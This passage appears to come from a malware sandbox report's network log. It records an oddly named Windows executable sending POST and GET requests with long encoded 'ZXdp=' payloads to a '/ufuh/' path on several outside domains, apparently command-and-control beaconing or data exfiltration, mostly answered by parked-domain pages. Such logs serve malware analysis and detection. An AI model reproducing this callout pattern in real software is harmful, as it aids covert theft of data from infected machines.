47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 3, 2024 08:52:59.682909966 CEST	212	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
Jun 3, 2024 08:52:59.682924032 CEST	1236	IN	Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
Jun 3, 2024 08:52:59.682969093 CEST	1236	IN	Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
Jun 3, 2024 08:52:59.682981014 CEST	1236	IN	Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
Jun 3, 2024 08:52:59.683084011 CEST	636	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jun 3, 2024 08:52:59.683190107 CEST	30	IN	Data Raw: 6e 74 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: nt --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49170	194.9.94.86	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:01.380553007 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 37 43 38 31 63 6d 2b 32 69 6a 71 79 6d 78 4b 78 76 49 64 51 63 66 73 6e 68 48 54 49 4f 45 6a 77 69 32 55 37 49 58 4f 59 61 7a 42 6b 47 37 74 73 5a 62 48 62 58 4b 74 63 76 74 2b 59 67 4e 71 64 43 73 4e 79 7a 48 62 5a 69 5a 68 64 62 38 62 76 6a 64 64 63 44 56 41 43 68 71 4e 55 6d 62 33 59 4c 43 6b 69 6d 59 6a 39 43 76 6f 48 41 46 37 53 67 75 4d 45 62 44 55 68 59 66 6d 4f 79 56 6f 45 66 34 73 61 58 68 6a 64 43 6b 38 77 6d 56 78 52 4e 79 30 56 63 79 68 6d 7a 5a 30 66 4a 6b 59 6a 54 6b 4a 70 49 6b 33 5a 6b 58 2f 36 4b 6d 42 2f 53 58 6b 72 39 7a 68 39 2f 6e 71 73 42 76 5a 78 4f 2f 41 35 58 6e 55 69 75 31 45 61 4c 63 69 75 59 4f 50 43 55 43 73 54 71 4a 70 6e 51 44 68 57 71 73 63 41 38 63 2f 31 68 75 59 5a 63 73 6d 77 67 73 4f 6e 5a 2f 2b 63 5a 52 51 47 65 45 69 37 71 6b 79 48 30 4a 36 2b 75 44 70 51 45 57 77 72 73 77 67 4a 64 4c 53 6a 4e 4f 34 32 57 43 78 62 2f 44 6f 59 6a 4c 48 49 36 38 66 6e 56 77 31 61 72 71 7a 67 61 37 38 4d 57 4b 57 67 71 4b 68 42 2f [TRUNCATED] Data Ascii: ZXdp=EANcFG92XFNa7C81cm+2ijqymxKxvIdQcfsnhHTIOEjwi2U7IXOYazBkG7tsZbHbXKtcvt+YgNqdCsNyzHbZiZhdb8bvjddcDVAChqNUmb3YLCkimYj9CvoHAF7SguMEbDUhYfmOyVoEf4saXhjdCk8wmVxRNy0VcyhmzZ0fJkYjTkJpIk3ZkX/6KmB/SXkr9zh9/nqsBvZxO/A5XnUiu1EaLciuYOPCUCsTqJpnQDhWqscA8c/1huYZcsmwgsOnZ/+cZRQGeEi7qkyH0J6+uDpQEWwrswgJdLSjNO42WCxb/DoYjLHI68fnVw1arqzga78MWKWgqKhB/mcH3CMkgrmmdcj9XxEJho0iJ9AqstlAk++1kmInN6+rZBTZvj7OSi+PS9bxyp+gvTXKIpGkvm6udyL9dx5m6ssvUCC/hvIcUvfwuJ2P1liTSHyHPhc9pgZ1yDSOfErmQnYRpB7mBMipvQWdBhMmgN8Q5jXuDJpvva59AIabfMkhLGfDHAddKOaRn2Wbj7iuYNiMUJLrRqhXmApbPnjYZLbcYrzJzO5d070ZcggLaK+NgkdtDzENMiUnh+nhGGXuL24bkm2Ri1ZF7gj30bYl0xjJpEfdeW92Mz+fAB4DIcVpxWRsOz1qWVH7PF0YLXTapSunqsCNXy9apagjRmRa2nvCpjb9733D+4X7rbB9MlCDH64vQIAl+PBIumBXT4eg+yZXHaSsYirG3iS5LtcsIbSMGoYXOLoRCUwOpNsKMOGCxi7P4sJhO90c+bpBOeFmLBwi5/sru2AtiGO8LLlpjhhmBgvaCUgRX5chetm3phNVbaj8w9pMPcDklfqyt0vLsFKGubuh8cASq3JVoSOQ7G5CRRHnB5n4NBZ1aJCSkuOwDTlLElclj+wTIkLIzdSBZqqP7TpYmpLRYN8/HzgLCH+ilm9NybLKUQEcysmPBLgzHde1D44u6gvplR+rn9dK1L+T7ayBONZ74umC/dQpi3A5pG0ddih0TQp [TRUNCATED]
Jun 3, 2024 08:53:01.385696888 CEST	1699	OUT	Data Raw: 36 44 47 79 2f 70 7a 4c 45 6e 32 32 6e 2b 6a 2b 6b 36 49 6c 7a 73 56 56 2f 49 48 51 4f 62 34 53 48 53 69 65 76 69 34 52 4c 49 76 58 74 31 75 51 76 44 56 69 50 51 63 49 4e 63 6e 43 78 77 79 36 6b 34 31 2b 79 63 6c 77 53 56 66 57 38 51 46 58 77 65 Data Ascii: 6DGy/pzLEn22n+j+k6IlzsVV/IHQOb4SHSievi4RLIvXt1uQvDViPQcINcnCxwy6k41+yclwSVfW8QFXwe3Qoo8kum0Rc9/mllSHAkBDhk+N3M6TYMYsahxbdkeXqrJXdPCb+yAuTXwpHTG+mWLrs1WNis/uPn+pef6UrzxsL/P/dSPHoWRWIB9OdaoNBJDDZwcdli5QKYrFm9VpSN7Y725/k4uSralC3XEzetlRfitUqPjdDXb
Jun 3, 2024 08:53:02.210349083 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:53:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 3, 2024 08:53:02.210400105 CEST	212	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
Jun 3, 2024 08:53:02.210441113 CEST	1236	IN	Data Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
Jun 3, 2024 08:53:02.210477114 CEST	1236	IN	Data Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
Jun 3, 2024 08:53:02.210513115 CEST	1236	IN	Data Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70 Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
Jun 3, 2024 08:53:02.210570097 CEST	636	IN	Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72 Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jun 3, 2024 08:53:02.210609913 CEST	30	IN	Data Raw: 6e 74 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: nt --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49171	194.9.94.86	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:03.908283949 CEST	469	OUT	GET /ufuh/?ZXdp=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.xn--matfrmn-jxa4m.se User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:53:04.744316101 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 03 Jun 2024 06:53:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.24 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Jun 3, 2024 08:53:04.744374037 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Jun 3, 2024 08:53:04.744412899 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Jun 3, 2024 08:53:04.744448900 CEST	1236	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Jun 3, 2024 08:53:04.744514942 CEST	878	IN	Data Raw: 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 73 69 74 65 62 75 69 6c 64 65 72 22 3e 43 72 65 61 74 65 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 77 69 74 68 Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.22	49172	91.195.240.19	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:09.897958994 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.primeplay88.org Origin: http://www.primeplay88.org Referer: http://www.primeplay88.org/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 6a 44 58 71 4f 62 6b 69 45 6a 42 59 51 32 6a 70 48 61 45 46 55 52 6f 69 39 38 37 5a 78 7a 6b 4b 6d 54 4b 46 59 53 55 45 50 75 39 67 4f 62 53 4d 73 31 33 4f 49 6d 71 64 48 50 70 76 30 6c 5a 70 41 43 69 43 58 51 41 67 47 63 50 57 47 61 43 32 4e 50 6b 77 71 31 31 54 44 33 62 31 31 52 45 58 30 2b 35 78 4f 76 54 47 54 55 72 76 51 45 4e 4c 43 64 48 47 2f 32 59 48 36 72 35 6a 4d 4b 76 45 69 4e 54 42 30 56 68 7a 44 33 66 49 6e 78 54 39 6b 35 71 2b 41 51 45 46 65 51 79 4a 61 36 66 6c 49 53 69 30 63 55 41 61 54 4f 61 70 31 4c 52 6c 72 53 45 79 35 41 52 41 37 2f 56 77 76 46 43 77 65 70 54 34 75 6b 56 45 52 44 65 56 33 44 2f 37 48 62 4e 57 50 57 44 41 4e 6f 75 52 31 74 71 51 43 75 31 77 61 6b 43 37 48 79 6d 53 38 2b 71 77 30 77 32 76 2b 72 31 48 71 52 47 79 4b 7a 59 35 73 65 79 42 78 38 66 48 4f 43 61 2f 4a 76 72 68 6f 59 4c 78 41 64 64 6a 6c 6a 73 42 38 57 4d 4f 77 73 69 38 77 43 39 51 7a 32 77 51 41 56 70 63 32 2f 48 2b 41 78 6b 64 78 4b 7a 6e 74 4c 52 35 42 6a 6d 69 48 32 39 75 79 53 63 41 36 [TRUNCATED] Data Ascii: ZXdp=jDXqObkiEjBYQ2jpHaEFURoi987ZxzkKmTKFYSUEPu9gObSMs13OImqdHPpv0lZpACiCXQAgGcPWGaC2NPkwq11TD3b11REX0+5xOvTGTUrvQENLCdHG/2YH6r5jMKvEiNTB0VhzD3fInxT9k5q+AQEFeQyJa6flISi0cUAaTOap1LRlrSEy5ARA7/VwvFCwepT4ukVERDeV3D/7HbNWPWDANouR1tqQCu1wakC7HymS8+qw0w2v+r1HqRGyKzY5seyBx8fHOCa/JvrhoYLxAddjljsB8WMOwsi8wC9Qz2wQAVpc2/H+AxkdxKzntLR5BjmiH29uyScA6tAoZ7F0PJ/nShC3U+4nlo2bdNGuBMZd0tZx0mOvZo8SJbfhBV8etSfKU/IdDh3fMCtwXW0a0HuEh8vB6blJo+GfWYbOvcLa2mhlHMKYi8OPnFam+DuGZEMM335WKXk4tAxf6iKeymUjRcIM0EKQYb/OZI1H1pHgbsehVlMLqDmUFCXnvR4bY9/CyisiBdc7SVgrDDIoZNbDfbEVmRysXEUORcsirHhJUjAp9NPHQES9TkX59rTLhycpBog1ptzRJQIBoO2wanDT1EPQ1SSOGPocnUIvaqZe5SB/mvZWfqpyY4GaAGQP9XJ+lSqJz3LBYm3LOd0pgDZrKUt9gKamC5zgVvZ3/TLKrnIMOFY5SUVkGXbo3qhg4DHkQjybTZzDUSh+3jmum2AiVmULcab/3SKRDkW2iVjPc1TBL3VUL0U2UhGYJbnNXkX8fqq0yx8cmEYdbhmv/FnTqs0cWqiVzIegvUrj95LweIDfMvq9ylqyIcv3rZBZBTP6oQfAO35zF/E1nVLOY8lEuhxk8rpZ8h79SF35oEHmI7uF/C790E7sej617kKTDqaJVzjAZ2b4k/uPlE+dwotYtpk//rSE7LK8Wbh2YBjh8mcEoZmF4RA9ro3VvA4KHF3cJFshVxGjRrTj2Y2Nh91N3ncFJ77am4Kqe6aqXtcJ4gv [TRUNCATED]
Jun 3, 2024 08:53:09.904539108 CEST	220	OUT	Data Raw: 43 4f 42 4a 65 5a 58 5a 76 79 7a 45 72 42 56 5a 46 36 4f 32 58 34 53 66 5a 53 59 34 65 39 67 78 72 4c 52 2f 48 65 4a 61 33 71 7a 7a 69 61 47 6b 64 70 61 6a 61 67 52 71 75 48 34 69 61 52 4f 45 54 7a 78 34 47 44 5a 57 55 76 62 35 42 7a 42 48 48 30 Data Ascii: COBJeZXZvyzErBVZF6O2X4SfZSY4e9gxrLR/HeJa3qzziaGkdpajagRquH4iaROETzx4GDZWUvb5BzBHH0Aj8j58goRRCNqujBBdntqN5RXesCZqwEeL7celPBXmdjXZTnjup84szdYI5gQvn7m9RbWjSMbtAi7AfvLZ0rg1PhAWEBJwLntAfdT9eCfd35dDElASkZdFpUkVGl9Hi+8xj5w13606
